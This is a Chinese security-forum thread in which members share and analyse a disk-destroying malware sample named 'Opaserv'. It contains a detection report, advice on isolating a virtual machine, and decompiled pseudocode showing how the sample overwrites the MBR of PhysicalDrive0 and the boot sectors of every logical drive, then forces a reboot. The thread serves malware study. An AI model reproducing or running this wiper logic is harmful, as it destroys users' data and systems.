收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 Opaserv
123下一页
返回列表 发新帖
查看: 1101|回复: 22
收起左侧

[病毒样本] Opaserv

  [复制链接]
Flactine
发表于 2023-7-5 10:07:39 | 显示全部楼层 |阅读模式
会破坏MBR及分区表


密码:virus

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

沧桑浪子
发表于 2023-7-5 10:24:10 | 显示全部楼层
类型:
感染型病毒(Win32/Ransom.DiskWriter.HxQBzS8A)

描述:
感染型病毒(Win32/Ransom.DiskWriter.HxQBzS8A)

扫描引擎:
360云查杀引擎

文件路径:
F:\360SANDBOX\SHADOW\7\Opaserv\Opaserv.exe

文件指纹(MD5):
aacd03ba318677c2522dfd89524d6e61
回复

举报

郢都离人
发表于 2023-7-5 10:47:40 来自手机 | 显示全部楼层
请教一下,这种样本在虚拟机上运行,会影响实机不?
回复

举报

Flactine
 楼主| 发表于 2023-7-5 10:49:47 | 显示全部楼层
本帖最后由 Flactine 于 2023-7-5 10:50 编辑
郢都离人 发表于 2023-7-5 10:47
请教一下,这种样本在虚拟机上运行,会影响实机不?

把虚拟机的网卡禁用了或者把网卡删了就行了,不放心的话在“客户机隔离”里把“启用拖放”和“启用复制粘贴”也关了
回复

举报

喀反
发表于 2023-7-5 10:59:27 | 显示全部楼层
郢都离人 发表于 2023-7-5 10:47
请教一下,这种样本在虚拟机上运行,会影响实机不?

不会
回复

举报

ytysh
发表于 2023-7-5 11:15:37 | 显示全部楼层
TACHYON IS 6.0 Kill
回复

举报

猥琐大叔
发表于 2023-7-5 11:18:57 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

wowocock
发表于 2023-7-5 11:25:17 | 显示全部楼层
郢都离人 发表于 2023-7-5 10:47
请教一下,这种样本在虚拟机上运行,会影响实机不?

你想多了。
int start()
{
  HANDLE FileA; // esi
  HANDLE CurrentProcess; // eax
  DWORD NumberOfBytesWritten; // [esp+4h] [ebp-18h] BYREF
  struct _TOKEN_PRIVILEGES NewState; // [esp+8h] [ebp-14h] BYREF

  sub_4010E0();
  FileA = CreateFileA("\\\\.\\PhysicalDrive0", 0xC0000000, 3u, 0, 3u, 0, 0);
  SetFilePointer(FileA, 0, 0, 0);
  WriteFile(FileA, &unk_403008, 0x200u, &NumberOfBytesWritten, 0);
  CloseHandle(FileA);
  CurrentProcess = GetCurrentProcess();
  OpenProcessToken(CurrentProcess, 0x28u, (PHANDLE)&NumberOfBytesWritten);
  LookupPrivilegeValueA(0, "SeShutdownPrivilege", &NewState.Privileges[0].Luid);
  NewState.PrivilegeCount = 1;
  NewState.Privileges[0].Attributes = 2;
  AdjustTokenPrivileges((HANDLE)NumberOfBytesWritten, 0, &NewState, 0, 0, 0);
  ExitWindowsEx(6u, 0x10007u);
  return 0;
}
回复

举报

wowocock
发表于 2023-7-5 11:31:09 | 显示全部楼层
DWORD sub_4010E0()
{
  HLOCAL v0; // ebx
  DWORD result; // eax
  CHAR *p_Buffer; // edi
  HANDLE FileA; // esi
  bool v4; // zf
  DWORD NumberOfBytesWritten; // [esp+4h] [ebp-114h] BYREF
  CHAR Buffer; // [esp+8h] [ebp-110h] BYREF
  char v7[259]; // [esp+9h] [ebp-10Fh] BYREF
  CHAR FileName[8]; // [esp+10Ch] [ebp-Ch] BYREF

  v0 = LocalAlloc(0, 0x1400u);
  Buffer = 0;
  sub_401320((int)v7, 0, 259u);
  result = GetLogicalDriveStringsA(0x104u, &Buffer) - 1;
  if ( result <= 0x103 )
  {
    p_Buffer = &Buffer;
    if ( Buffer )
    {
      do
      {
        strcpy(FileName, "\\\\.\\");
        *(_WORD *)&FileName[4] = *(_WORD *)p_Buffer;
        FileA = CreateFileA(FileName, 0xC0000000, 3u, 0, 3u, 0, 0);
        WriteFile(FileA, v0, 0x1400u, &NumberOfBytesWritten, 0);
        DeviceIoControl(FileA, 0x90020u, 0, 0, 0, 0, &NumberOfBytesWritten, 0);
        CloseHandle(FileA);
        LocalFree(v0);
        result = strlen(p_Buffer);
        v4 = p_Buffer[result + 1] == 0;
        p_Buffer += result + 1;
      }
      while ( !v4 );
    }
  }
  return result;
}
除了干MBR外,还会干每个逻辑盘的引导区。
回复

举报

biue
发表于 2023-7-5 11:32:24 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-2 04:34 , Processed in 0.138701 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表